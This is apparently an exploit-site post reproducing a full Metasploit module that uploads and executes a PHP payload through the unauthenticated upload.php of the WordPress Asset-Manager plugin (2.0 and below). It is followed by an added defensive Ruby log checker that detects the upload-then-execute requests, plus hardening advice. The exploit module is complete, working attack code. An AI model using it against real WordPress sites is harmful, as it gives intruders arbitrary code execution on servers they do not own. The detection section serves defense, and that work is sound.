WordPress Asset-Manager PHP File Upload Vulnerability

Posted on 2012-12-31 09:22:33
This module, from the Metasploit exploit library, exploits a vulnerability found in the Asset-Manager plugin for WordPress, version 2.0 and below. It allows PHP file upload: a user can upload a file to a temp directory without authentication, which results in arbitrary code execution.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart body; the plugin's upload handler expects the file in the "Filedata" field
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # The handler echoes the stored file name on success
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The uploaded file lands in a web-accessible temp directory and is requested directly
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
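As an added defender-side example (not part of the original post or of the Metasploit module), here is a small Ruby access-log check that flags the upload-then-execute sequence the module produces: a POST to the plugin's upload.php followed by a GET of a .php file from wp-content/uploads/assets/temp by the same client. The log lines are constructed for illustration; the two path patterns are taken from the module above, and the 300-second pairing window is an assumed value.

```ruby
require 'time'

# Constructed Apache combined-log sample (not real traffic): one upload/execute pair,
# one benign image fetch from the temp directory, one unrelated request.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [31/Dec/2012:09:20:01 +0800] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 87 "-" "Mozilla/5.0"
  203.0.113.7 - - [31/Dec/2012:09:20:02 +0800] "GET /wordpress/wp-content/uploads/assets/temp/kqzrt.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
  198.51.100.4 - - [31/Dec/2012:09:21:10 +0800] "GET /wordpress/wp-content/uploads/assets/temp/photo.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
  198.51.100.9 - - [31/Dec/2012:09:22:00 +0800] "GET /wordpress/ HTTP/1.1" 200 3000 "-" "curl/7.2"
LOG

LINE_RE     = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/
UPLOAD_RE   = %r{/wp-content/plugins/asset-manager/upload\.php\z}   # the unauthenticated upload handler
TEMP_PHP_RE = %r{/wp-content/uploads/assets/temp/[^/]+\.php\z}      # PHP fetched from the temp directory

# Parse one log line into a hash; the query string is dropped so path matching is stable.
def parse_line(line)
  m = LINE_RE.match(line) or return nil
  { ip: m[:ip], ts: Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[:method], path: m[:path].split('?').first, status: m[:status].to_i }
end

# Any request for a .php file under uploads/assets/temp is suspicious on its own (that
# directory should only ever hold media); it is escalated to "high" when the same client
# POSTed to upload.php within window_seconds beforehand, i.e. the upload/execute pattern.
def find_asset_manager_abuse(log_text, window_seconds = 300)
  events  = log_text.each_line.map { |l| parse_line(l) }.compact
  uploads = events.select { |e| e[:method] == 'POST' && e[:path] =~ UPLOAD_RE }
  execs   = events.select { |e| e[:method] == 'GET'  && e[:path] =~ TEMP_PHP_RE }
  execs.map do |ex|
    paired = uploads.any? do |up|
      up[:ip] == ex[:ip] && (ex[:ts] - up[:ts]).between?(0, window_seconds)
    end
    { ip: ex[:ip], path: ex[:path], status: ex[:status],
      severity: paired ? 'high' : 'medium', time: ex[:ts].iso8601 }
  end
end

if __FILE__ == $0
  find_asset_manager_abuse(SAMPLE_LOG).each do |a|
    puts "#{a[:severity].upcase} #{a[:ip]} #{a[:path]} (#{a[:time]})"
  end
end
```

The same check applies to any WordPress site: a 200 response for a .php request inside wp-content/uploads is worth an alert regardless of plugin, and denying PHP execution under the uploads directory at the web server removes the execution step even when an upload filter fails.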